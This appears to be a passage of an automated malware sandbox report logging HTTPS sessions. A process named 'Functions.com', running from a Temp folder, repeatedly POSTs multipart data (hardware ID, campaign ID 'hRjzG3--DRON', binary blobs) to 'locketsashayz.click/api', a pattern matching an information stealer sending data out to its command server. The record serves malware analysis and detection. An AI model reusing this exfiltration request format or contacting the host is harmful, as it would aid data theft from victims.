                                    2024-12-25 21:44:56 UTC1369INData Raw: 32 57 54 5a 78 47 58 41 38 6a 32 66 42 2b 50 34 59 61 4a 4f 34 67 59 69 45 2b 76 63 79 6e 56 55 36 42 7a 72 2f 66 4e 59 41 49 32 38 73 4d 75 45 31 47 43 6d 6e 4b 75 6d 74 32 68 78 70 6e 74 57 59 6f 59 33 71 35 32 4f 34 42 41 36 48 48 73 39 34 78 67 78 2f 61 6a 6b 50 7a 53 30 77 46 49 35 36 6f 64 32 69 47 43 53 71 76 49 47 38 68 65 75 61 41 70 45 74 47 6a 73 36 79 31 7a 57 4d 42 4e 33 4c 48 37 74 44 54 51 6c 72 77 37 46 68 65 6f 77 52 62 37 56 79 65 69 34 2b 73 4d 7a 75 46 77 4f 48 30 76 69 4b 63 61 55 5a 33 74 34 4c 73 41 56 56 53 33 71 47 75 57 73 2f 32 56 5a 6b 75 47 78 6a 4b 6a 47 31 78 4b 70 5a 54 6f 76 45 74 74 73 39 69 41 4c 61 33 41 43 32 54 55 41 4d 5a 73 71 7a 5a 47 32 43 46 79 54 34 49 47 38 31 65 75 61 41 69 57 70 30 6f 34 71 6e 6e 43 6a 41 43
                                    Data Ascii: 2WTZxGXA8j2fB+P4YaJO4gYiE+vcynVU6Bzr/fNYAI28sMuE1GCmnKumt2hxpntWYoY3q52O4BA6HHs94xgx/ajkPzS0wFI56od2iGCSqvIG8heuaApEtGjs6y1zWMBN3LH7tDTQlrw7FheowRb7Vyei4+sMzuFwOH0viKcaUZ3t4LsAVVS3qGuWs/2VZkuGxjKjG1xKpZTovEtts9iALa3AC2TUAMZsqzZG2CFyT4IG81euaAiWp0o4qnnCjAC
                                    2024-12-25 21:44:56 UTC1369INData Raw: 7a 61 55 6b 4b 61 49 61 68 4b 57 62 42 45 57 6a 32 4f 43 67 71 4d 72 62 4f 72 56 39 49 6a 4d 61 35 32 7a 65 46 42 74 72 42 43 72 70 43 53 67 4e 78 77 62 4e 75 66 34 6f 66 62 72 4a 68 59 32 31 30 2f 73 65 32 47 52 76 41 2b 4c 2f 45 49 59 4e 4f 77 6f 41 55 38 30 4a 47 52 54 75 47 73 33 56 2b 68 41 52 67 75 57 74 36 4a 6a 79 2b 78 62 78 65 54 34 72 46 75 39 6f 38 67 77 62 50 7a 67 43 7a 56 31 67 44 61 4d 6a 2b 4b 54 2b 47 44 69 54 75 49 46 6b 36 4d 66 37 66 34 45 41 44 68 38 62 34 69 6e 47 44 42 4e 44 41 48 37 64 44 51 51 5a 74 7a 72 74 76 65 34 73 62 61 37 31 71 59 53 55 36 73 63 57 6d 55 6b 57 4f 79 37 37 65 50 4d 42 41 6e 63 6b 56 38 78 30 4b 49 6e 6e 4c 75 48 42 75 74 42 46 6b 35 79 42 33 59 79 50 2b 78 36 49 5a 47 38 44 48 74 4e 67 38 68 51 72 56 79 51
                                    Data Ascii: zaUkKaIahKWbBEWj2OCgqMrbOrV9IjMa52zeFBtrBCrpCSgNxwbNuf4ofbrJhY210/se2GRvA+L/EIYNOwoAU80JGRTuGs3V+hARguWt6Jjy+xbxeT4rFu9o8gwbPzgCzV1gDaMj+KT+GDiTuIFk6Mf7f4EADh8b4inGDBNDAH7dDQQZtzrtve4sba71qYSU6scWmUkWOy77ePMBAnckV8x0KInnLuHButBFk5yB3YyP+x6IZG8DHtNg8hQrVyQ
                                    2024-12-25 21:44:56 UTC1369INData Raw: 52 57 54 4b 2f 6a 38 2f 6a 78 74 69 74 32 46 67 4a 54 71 34 79 71 70 61 53 6f 50 4e 73 64 51 36 67 77 54 53 79 51 75 33 52 55 45 43 62 63 43 37 62 48 62 42 57 43 53 78 65 43 68 31 65 70 6a 6a 76 45 74 78 6a 73 6d 6a 6b 69 37 4f 46 35 33 4a 41 66 4d 64 43 67 35 72 79 61 78 69 64 6f 6b 53 62 62 5a 6b 59 69 41 39 76 73 57 6a 58 45 65 4f 7a 72 2f 53 50 59 38 4a 31 63 45 4a 73 30 6f 4b 53 79 50 42 70 69 63 6e 77 54 5a 76 6f 45 46 6d 4a 69 6a 2b 33 2b 42 41 41 34 66 47 2b 49 70 78 6a 67 66 63 78 67 4f 2f 54 55 34 58 59 38 32 33 61 48 36 4f 46 6d 65 33 61 6d 41 2f 50 4c 37 4c 70 6c 35 4c 68 4d 53 71 30 7a 37 41 51 4a 33 4a 46 66 4d 64 43 6a 52 31 77 62 6c 6f 50 61 67 52 66 37 64 71 61 79 59 32 2f 74 2f 67 51 41 4f 48 78 76 69 4b 63 59 30 43 30 4d 6f 66 76 30 56
                                    Data Ascii: RWTK/j8/jxtit2FgJTq4yqpaSoPNsdQ6gwTSyQu3RUECbcC7bHbBWCSxeCh1epjjvEtxjsmjki7OF53JAfMdCg5ryaxidokSbbZkYiA9vsWjXEeOzr/SPY8J1cEJs0oKSyPBpicnwTZvoEFmJij+3+BAA4fG+IpxjgfcxgO/TU4XY823aH6OFme3amA/PL7Lpl5LhMSq0z7AQJ3JFfMdCjR1wbloPagRf7dqayY2/t/gQAOHxviKcY0C0Mofv0V
                                    2024-12-25 21:44:56 UTC1369INData Raw: 76 35 73 63 59 51 58 61 4c 78 6e 5a 6a 38 37 74 4d 79 76 58 6b 53 4c 32 4c 50 41 4f 6f 67 4e 30 38 59 45 73 30 74 4b 42 47 37 47 2f 69 6b 2f 68 67 34 6b 37 69 42 4e 44 69 32 6f 79 75 78 36 56 4a 62 41 76 39 34 6e 69 77 2f 65 32 41 43 6a 42 51 52 46 63 73 47 76 4a 79 65 58 42 6e 4f 78 66 79 59 30 65 72 6e 4d 37 67 45 44 69 38 57 32 33 7a 71 45 42 39 6a 47 44 72 5a 41 51 41 6c 76 78 37 5a 75 64 59 51 54 59 72 78 6a 5a 69 49 37 73 73 53 6e 56 30 72 41 68 50 6a 56 4b 63 42 57 6e 66 67 64 74 46 31 48 46 53 48 30 76 58 5a 75 6c 42 74 30 73 43 4a 48 4c 6a 61 39 78 61 6c 4a 41 35 2b 45 6f 5a 49 32 6a 45 36 46 6a 67 32 33 53 55 6b 43 62 63 6d 7a 61 48 69 4b 47 57 36 34 63 6d 63 6f 4d 72 4c 49 6f 30 74 4a 69 74 69 78 32 7a 79 4f 42 73 2f 4e 54 66 30 46 54 52 30 6a
                                    Data Ascii: v5scYQXaLxnZj87tMyvXkSL2LPAOogN08YEs0tKBG7G/ik/hg4k7iBNDi2oyux6VJbAv94niw/e2ACjBQRFcsGvJyeXBnOxfyY0ernM7gEDi8W23zqEB9jGDrZAQAlvx7ZudYQTYrxjZiI7ssSnV0rAhPjVKcBWnfgdtF1HFSH0vXZulBt0sCJHLja9xalJA5+EoZI2jE6Fjg23SUkCbcmzaHiKGW64cmcoMrLIo0tJitix2zyOBs/NTf0FTR0j
                                    2024-12-25 21:44:56 UTC1369INData Raw: 69 2f 4b 45 53 39 64 6d 6b 67 4d 62 4c 2b 6b 45 78 41 6a 73 53 2f 78 43 44 41 51 4a 33 42 54 65 74 38 43 6b 30 6a 2b 66 41 6e 5a 38 46 4f 4a 49 4e 6a 5a 69 4d 39 71 4e 48 6a 65 55 69 57 79 37 58 5a 50 63 49 50 30 4e 34 4b 38 77 73 4b 41 79 4f 65 37 69 6b 2f 68 51 63 6b 37 6a 41 36 64 6d 2f 74 6c 2f 34 4c 58 4d 37 54 2b 4d 52 78 32 46 79 54 6a 68 2f 7a 48 51 70 43 59 4e 53 73 59 58 79 58 46 53 4f 49 58 6b 67 6d 4e 72 33 4d 72 31 34 44 7a 6f 71 33 6b 6d 6d 35 54 74 37 63 48 2f 78 55 58 41 68 7a 77 66 4a 76 62 6f 77 61 4a 50 67 67 4a 43 6b 78 73 73 57 70 53 51 79 53 32 72 50 65 4a 38 77 4b 7a 34 35 44 38 31 52 42 43 6e 48 49 75 53 68 75 6c 78 74 30 74 57 56 76 59 54 4b 76 7a 61 49 5a 44 63 44 66 73 39 34 33 6a 52 75 53 33 78 75 77 55 30 31 4a 61 39 65 7a 61
                                    Data Ascii: i/KES9dmkgMbL+kExAjsS/xCDAQJ3BTet8Ck0j+fAnZ8FOJINjZiM9qNHjeUiWy7XZPcIP0N4K8wsKAyOe7ik/hQck7jA6dm/tl/4LXM7T+MRx2FyTjh/zHQpCYNSsYXyXFSOIXkgmNr3Mr14Dzoq3kmm5Tt7cH/xUXAhzwfJvbowaJPggJCkxssWpSQyS2rPeJ8wKz45D81RBCnHIuShulxt0tWVvYTKvzaIZDcDfs943jRuS3xuwU01Ja9eza
                                    2024-12-25 21:44:56 UTC1369INData Raw: 6b 72 69 41 77 62 51 2b 39 7a 71 42 65 56 5a 47 48 6e 74 45 32 68 67 33 54 32 52 7a 7a 43 77 6f 44 49 35 37 73 4b 54 2b 46 42 79 54 75 4d 44 70 32 62 2b 32 58 2f 67 74 63 7a 74 50 34 78 48 48 59 58 5a 4f 4f 48 2f 4d 64 43 6b 4a 74 79 37 39 6b 63 59 49 45 64 72 42 6a 66 69 35 39 67 50 36 4c 56 45 36 46 78 4c 2f 73 44 36 45 45 7a 63 4d 43 74 48 74 30 4d 6e 4c 42 72 69 56 5a 67 67 42 6e 39 69 34 6f 4e 58 72 6d 67 49 39 54 55 34 33 46 76 35 4a 2f 77 41 71 64 6c 6b 32 57 53 45 63 41 62 63 48 38 52 6e 57 52 47 32 75 78 49 43 5a 74 4e 76 36 59 37 6c 68 4a 6b 4d 65 33 31 58 32 48 46 4e 71 4f 51 2f 4e 4c 43 6c 30 6a 78 37 52 33 63 6f 34 52 4b 4c 42 75 5a 6d 30 6c 38 4e 6e 75 54 77 50 59 6d 66 61 53 49 38 42 57 6e 59 6b 44 76 6b 52 4a 43 32 44 55 72 47 46 38 6c 78
                                    Data Ascii: kriAwbQ+9zqBeVZGHntE2hg3T2RzzCwoDI57sKT+FByTuMDp2b+2X/gtcztP4xHHYXZOOH/MdCkJty79kcYIEdrBjfi59gP6LVE6FxL/sD6EEzcMCtHt0MnLBriVZggBn9i4oNXrmgI9TU43Fv5J/wAqdlk2WSEcAbcH8RnWRG2uxICZtNv6Y7lhJkMe31X2HFNqOQ/NLCl0jx7R3co4RKLBuZm0l8NnuTwPYmfaSI8BWnYkDvkRJC2DUrGF8lx


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.449740172.67.158.1904437844C:\Users\user\AppData\Local\Temp\8429\Functions.com
                                    TimestampBytes transferredDirectionData
                                    2024-12-25 21:44:58 UTC275OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=CDE2PQC5
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 18102
                                    Host: locketsashayz.click
                                    2024-12-25 21:44:58 UTC15331OUTData Raw: 2d 2d 43 44 45 32 50 51 43 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 45 35 42 35 34 35 39 32 45 46 36 36 43 42 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 43 44 45 32 50 51 43 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 44 45 32 50 51 43 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 43 44 45 32 50 51 43 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                    Data Ascii: --CDE2PQC5Content-Disposition: form-data; name="hwid"B3E5B54592EF66CBD0F23BE3BFA4D7B0--CDE2PQC5Content-Disposition: form-data; name="pid"2--CDE2PQC5Content-Disposition: form-data; name="lid"hRjzG3--DRON--CDE2PQC5Content-Dispositi
                                    2024-12-25 21:44:58 UTC2771OUTData Raw: cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19 4d
                                    Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{M
                                    2024-12-25 21:44:59 UTC1141INHTTP/1.1 200 OK
                                    Date: Wed, 25 Dec 2024 21:44:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=pgt9u360u6d4ggcdqnqj11bfan; expires=Sun, 20 Apr 2025 15:31:37 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wkm5wcHKBTACcw%2FSly%2FHuw%2Bz4eNjp%2B%2F%2FdEqSQIszaMF6kRreUI4rzPI%2FCZ2BS7%2BcIyLBLbQo5iygG7xMlA3XnGsSBglPg1I3eBlpgWY4OGCGzb5wluuCC%2BBXEMM6EiGkXY7M6JcF"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f7c03f53f87c484-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1495&rtt_var=572&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19057&delivery_rate=1894873&cwnd=248&unsent_bytes=0&cid=a4443d32cce247f1&ts=922&x=0"
                                    2024-12-25 21:44:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2024-12-25 21:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.449741172.67.158.1904437844C:\Users\user\AppData\Local\Temp\8429\Functions.com
                                    TimestampBytes transferredDirectionData
                                    2024-12-25 21:45:00 UTC281OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=U7I3OYSRQVLGNEJ
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8765
                                    Host: locketsashayz.click
                                    2024-12-25 21:45:00 UTC8765OUTData Raw: 2d 2d 55 37 49 33 4f 59 53 52 51 56 4c 47 4e 45 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 45 35 42 35 34 35 39 32 45 46 36 36 43 42 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 55 37 49 33 4f 59 53 52 51 56 4c 47 4e 45 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 37 49 33 4f 59 53 52 51 56 4c 47 4e 45 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 55 37 49 33 4f 59
                                    Data Ascii: --U7I3OYSRQVLGNEJContent-Disposition: form-data; name="hwid"B3E5B54592EF66CBD0F23BE3BFA4D7B0--U7I3OYSRQVLGNEJContent-Disposition: form-data; name="pid"2--U7I3OYSRQVLGNEJContent-Disposition: form-data; name="lid"hRjzG3--DRON--U7I3OY
                                    2024-12-25 21:45:01 UTC1127INHTTP/1.1 200 OK
                                    Date: Wed, 25 Dec 2024 21:45:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=94m4liaqdh3t6c4hhkc0e4ahr5; expires=Sun, 20 Apr 2025 15:31:40 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qkJkVRR66rOYemsLqodZJPjZx7BBUwg%2BWJkvFZdgQWxn2RJwtIJVkchvVBVLJZbN%2FJK6H4VQfue3vpyBWJ5P8UtuX2bgD7CyyAoiFLH3ewYW%2BwuhBnQMllIPkQCKGimqmNiGI3LG"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f7c0403dca5727a-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1801&rtt_var=687&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9704&delivery_rate=1580086&cwnd=221&unsent_bytes=0&cid=b07f825618bbc60b&ts=810&x=0"
                                    2024-12-25 21:45:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2024-12-25 21:45:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.449742172.67.158.1904437844C:\Users\user\AppData\Local\Temp\8429\Functions.com
                                    TimestampBytes transferredDirectionData
                                    2024-12-25 21:45:02 UTC279OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=GKG54EEMA5BV
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 20400
                                    Host: locketsashayz.click
                                    2024-12-25 21:45:02 UTC15331OUTData Raw: 2d 2d 47 4b 47 35 34 45 45 4d 41 35 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 45 35 42 35 34 35 39 32 45 46 36 36 43 42 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 47 4b 47 35 34 45 45 4d 41 35 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 4b 47 35 34 45 45 4d 41 35 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 47 4b 47 35 34 45 45 4d 41 35 42 56 0d 0a 43
                                    Data Ascii: --GKG54EEMA5BVContent-Disposition: form-data; name="hwid"B3E5B54592EF66CBD0F23BE3BFA4D7B0--GKG54EEMA5BVContent-Disposition: form-data; name="pid"3--GKG54EEMA5BVContent-Disposition: form-data; name="lid"hRjzG3--DRON--GKG54EEMA5BVC
                                    2024-12-25 21:45:02 UTC5069OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b
                                    Data Ascii: lrQMn 64F6(X&7~`aO
                                    2024-12-25 21:45:03 UTC1133INHTTP/1.1 200 OK
                                    Date: Wed, 25 Dec 2024 21:45:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=vt3pqb8q9uc8mak05t7mgif8tu; expires=Sun, 20 Apr 2025 15:31:42 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nowPEmJyKB6zv2OuY%2BsXQotZgEvwD15k4FmB0kfVyazVNVzdDHGzz2O7yB3vEcXnH24tp%2F0luAKT1WyqOoCj%2F3KZqH8ERWj5nS4IqF2%2FEyPTQ%2FY7DePlmogSiN8crkMXqBRKAkIk"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f7c0410debb5e6a-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1721&rtt_var=658&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21359&delivery_rate=1648785&cwnd=224&unsent_bytes=0&cid=b86a6c258764913a&ts=940&x=0"
                                    2024-12-25 21:45:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2024-12-25 21:45:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.449744172.67.158.1904437844C:\Users\user\AppData\Local\Temp\8429\Functions.com
                                    TimestampBytes transferredDirectionData
                                    2024-12-25 21:45:05 UTC283OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=MG4J6KCQKGA918BMT
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 7129
                                    Host: locketsashayz.click
                                    2024-12-25 21:45:05 UTC7129OUTData Raw: 2d 2d 4d 47 34 4a 36 4b 43 51 4b 47 41 39 31 38 42 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 45 35 42 35 34 35 39 32 45 46 36 36 43 42 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 4d 47 34 4a 36 4b 43 51 4b 47 41 39 31 38 42 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 47 34 4a 36 4b 43 51 4b 47 41 39 31 38 42 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d
                                    Data Ascii: --MG4J6KCQKGA918BMTContent-Disposition: form-data; name="hwid"B3E5B54592EF66CBD0F23BE3BFA4D7B0--MG4J6KCQKGA918BMTContent-Disposition: form-data; name="pid"1--MG4J6KCQKGA918BMTContent-Disposition: form-data; name="lid"hRjzG3--DRON--
                                    2024-12-25 21:45:05 UTC1129INHTTP/1.1 200 OK
                                    Date: Wed, 25 Dec 2024 21:45:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=g40jgmvb3qnriuvqedbse95iv1; expires=Sun, 20 Apr 2025 15:31:44 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FfwevKFyz6%2BPGfVq0GXsbWZC6iae2e%2BVtkr8qbq5w7Q0JfJJHRW8Kq3v9XkYNzxZ4WfluPhBLISJQkvbBABXYzJPwuUwXr3lOz7TEd3Mov%2BcHENflZI889J3le%2FTVI2l0RsbOU3S"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f7c04205e1343f7-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1687&rtt_var=650&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2847&recv_bytes=8048&delivery_rate=1660978&cwnd=213&unsent_bytes=0&cid=0f02596dad1df5b7&ts=780&x=0"
                                    2024-12-25 21:45:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2024-12-25 21:45:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.449751172.67.158.1904437844C:\Users\user\AppData\Local\Temp\8429\Functions.com
                                    TimestampBytes transferredDirectionData
                                    2024-12-25 21:45:07 UTC279OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=PZIDIZOGNX37O
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 1226
                                    Host: locketsashayz.click
